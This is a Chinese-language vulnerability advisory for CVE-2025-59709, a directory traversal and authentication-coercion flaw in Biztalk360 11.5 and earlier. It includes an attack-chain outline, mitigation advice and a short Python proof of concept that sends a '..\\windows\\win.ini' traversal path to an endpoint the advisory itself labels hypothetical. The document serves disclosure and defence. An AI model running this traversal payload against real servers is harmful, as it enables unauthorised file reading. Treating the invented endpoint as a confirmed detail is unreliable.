CVE-2025-59709 CVSS 6.8 中危

CVE-2025-59709 Biztalk360 目录遍历漏洞

披露日期: 2026-04-03

来源: [email protected]

漏洞信息

漏洞编号

CVE-2025-59709

漏洞类型

目录遍历

CVSS评分

6.8 中危

攻击向量

网络 (AV:N)

认证要求

高权限 (PR:H)

用户交互

无需交互 (UI:N)

影响产品

Biztalk360

漏洞概述

Biztalk360 11.5及之前版本中存在一处安全漏洞，主要由于服务器未能正确处理用户提供的输入路径。拥有超级用户权限的攻击者可以利用此缺陷，通过构造特定的目录遍历请求，读取服务器上的敏感文件。此外，该漏洞还允许攻击者诱导服务端发起认证请求，造成潜在的信息泄露风险。

技术细节

该漏洞的根源在于Biztalk360在处理涉及文件读取的功能时，对用户输入的路径参数缺乏严格的校验和过滤。由于系统要求攻击者具备高权限（PR:H），利用门槛相对较高，但危害依然显著。攻击者可以利用“../”序列进行目录遍历攻击，打破文件系统的沙箱限制，从而访问Web根目录之外的配置文件、日志或其他敏感数据。此外，漏洞描述中提到的“coerce an authentication”暗示该漏洞可能结合了SSRF（服务器端请求伪造）特性，攻击者可通过控制读取的路径（如UNC路径）迫使服务向恶意服务器发送NTLM或Kerberos认证令牌，进而可能引发中继攻击，导致更严重的安全后果。

攻击链分析

STEP 1

1. 获取权限

攻击者获取Biztalk360应用程序的超级用户账户凭证。

STEP 2

2. 识别端点

定位处理文件路径读取功能的API端点或页面。

STEP 3

3. 构造载荷

构造包含目录遍历字符（如../）或UNC路径的恶意输入参数。

STEP 4

4. 发送请求

利用超级用户会话向服务器发送包含恶意路径的请求。

STEP 5

5. 执行攻击

服务器解析路径并读取敏感文件，或向攻击者指定的地址发送认证请求。

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

import requests

# Target configuration
target = "http://vulnerable-biztalk360-instance"
endpoint = "/api/endpoint/reading/file"  # Hypothetical vulnerable endpoint

# Attacker credentials (Super User required)
username = "super_user"
password = "password"

# Login to get session
session = requests.Session()
login_payload = {"user": username, "pass": password}
session.post(f"{target}/login", data=login_payload)

# Directory Traversal Payload
# Attempting to read Windows win.ini file
malicious_path = "..\\..\\..\\..\\windows\\win.ini"

# Send exploit request
exploit_url = f"{target}{endpoint}?path={malicious_path}"
response = session.get(exploit_url)

if response.status_code == 200 and "[extensions]" in response.text:
    print("[+] Exploit Successful! File content retrieved:")
    print(response.text)
else:
    print("[-] Exploit Failed.")

影响范围

Biztalk360 <= 11.5

防御指南

临时缓解措施

建议立即将Biztalk360升级到修复了该漏洞的最新版本。如果无法立即升级，应严格限制超级用户账户的使用，并监控网络流量中是否存在异常的文件读取请求或出站认证流量。

参考链接

快速导航: 前沿安全最新收录域名列表最新威胁情报列表最新网站排名列表最新工具资源列表最新CVE漏洞列表